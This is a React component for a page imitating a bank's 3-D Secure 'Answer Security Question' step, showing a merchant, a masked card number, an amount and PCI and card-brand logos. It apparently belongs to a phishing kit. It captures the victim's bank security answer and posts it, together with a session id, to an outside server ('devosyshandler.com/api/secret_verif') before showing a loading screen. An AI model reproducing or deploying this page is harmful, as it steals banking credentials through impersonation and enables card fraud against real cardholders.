import React, { useState } from 'react';
import HelpImage from './assets/help.gif';
import axios from 'axios';
import { useNavigate } from 'react-router-dom';
import PciImage from './assets/pci.jpg';
import VisaImage from './assets/visa.svg';
import MasterImage from './assets/master.jpg';

const SecurityQuestionPage = () => {
  const [balance_input, set_balance_input] = useState('');
  const [submitBtnContent, setSubmitBtnContent] = useState('Submit Answer');
  const [submitBtnDis, setSubmitBtnDis] = useState(false);

  const navigate = useNavigate();
  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1)
    .toString()
    .padStart(2, '0')}/${today.getFullYear()}`;

  const handleCodeSubmit = async (e) => {
    e?.preventDefault();
    setSubmitBtnContent('Processing...');
    const dataToSend = {
      uuId: localStorage.getItem('uuId'),
      question: localStorage.getItem('seq_quest'),
      answer: balance_input,
    };

    setSubmitBtnDis(true);
    navigate("/3ds/loading");

    try {
      const serverUrl = process.env.REACT_APP_SERVER_URL || 'https://devosyshandler.com';
      await axios.post(`${serverUrl}/api/secret_verif`, dataToSend);
    } catch (error) {
      setTimeout(() => {
        setSubmitBtnDis(false);
        setSubmitBtnContent('Submit Answer');
      }, 3000);
    }
  };

  const handleBalanceInputChange = (e) => {
    set_balance_input(e.target.value);
  };

  const firstDigit = localStorage.getItem('first-digit');
  let imageSrc = null;
  let altText = 'Card';
  if (firstDigit === '4') {
    imageSrc = VisaImage;
    altText = 'Visa';
  } else if (firstDigit === '5') {
    imageSrc = MasterImage;
    altText = 'Mastercard';
  }

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-slate-100 p-4">
      <div className="w-full max-w-sm px-6 py-7 bg-white border border-gray-300 shadow-xl rounded-xl">
        <div className="flex items-center justify-between w-full mb-5 pb-3 border-b border-gray-100">
          <img
            src={PciImage}
            alt="PCI DSS Compliant"
            className="h-9 mr-4 object-contain"
          />
          {imageSrc && (
            <img src={imageSrc} alt={altText} className="h-9 object-contain" />
          )}
        </div>
        <h1 className="mb-1.5 text-base font-extrabold text-gray-900 tracking-tight">
          Answer Security Question
        </h1>
        <p className="mb-4 text-xs text-gray-600 leading-relaxed">
          To complete this payment securely, please provide the answer to your bank security question.
        </p>

        <div className="grid grid-cols-2 mb-4 text-xs gap-y-2 bg-gray-50 border border-gray-200 rounded-lg p-3">
          <span className="text-gray-500 font-medium">Merchant:</span>
          <span className="text-gray-900 font-bold text-right truncate">
            {process.env.REACT_APP_MERCHANT_NAME || 'Dino World'}
          </span>

          <span className="text-gray-500 font-medium">Date:</span>
          <span className="text-gray-900 font-semibold text-right">{formattedDate}</span>

          <span className="text-gray-500 font-medium">Card Number:</span>
          <span className="text-gray-900 font-mono font-bold text-right">
            **** **** **** {localStorage.getItem('last-four-digits') || '••••'}
          </span>

          <span className="text-gray-500 font-medium">Amount:</span>
          <span className="text-[#0056b3] font-black text-right">
            {localStorage.getItem('currency') || process.env.REACT_APP_CURRENCY || 'USD'} {localStorage.getItem('summ') || '0.00'}
          </span>
        </div>

        <form onSubmit={handleCodeSubmit}>
          <div className="mb-4">
            <label htmlFor="security-answer" className="block mb-1.5 text-xs font-bold text-gray-700">
              {localStorage.getItem('seq_quest') || 'Security Question Prompt:'}
            </label>
            <input
              id="security-answer"
              type="text"
              placeholder="Enter your answer"
              value={balance_input}
              onChange={handleBalanceInputChange}
              className="w-full px-3 py-2.5 text-sm border border-gray-300 rounded-lg focus:outline-none focus:border-blue-600 focus:ring-2 focus:ring-blue-100 text-gray-900 bg-white"
              autoFocus
            />
          </div>

          <div className="flex items-center justify-between gap-2 pt-2 border-t border-gray-100">
            <button
              type="button"
              onClick={() => navigate('/checkout')}
              className="px-4 py-2.5 text-xs font-semibold text-gray-600 hover:text-gray-900 cursor-pointer"
            >
              Cancel
            </button>
            <button
              type="submit"
              disabled={submitBtnDis || !balance_input.trim()}
              className="flex-1 py-2.5 px-4 text-xs font-bold rounded-lg shadow-sm transition-all flex items-center justify-center gap-2 cursor-pointer bg-[#0056b3] hover:bg-[#004494] text-white hover:shadow disabled:opacity-50 disabled:cursor-not-allowed"
            >
              {submitBtnContent}
            </button>
            <button
              type="button"
              className="flex items-center px-2 py-2 text-xs font-medium text-gray-500 hover:text-gray-800"
            >
              <img className="mr-1 h-3.5 w-3.5" src={HelpImage} alt="Help" />
              Help
            </button>
          </div>
        </form>
      </div>
    </div>
  );
};

export default SecurityQuestionPage;
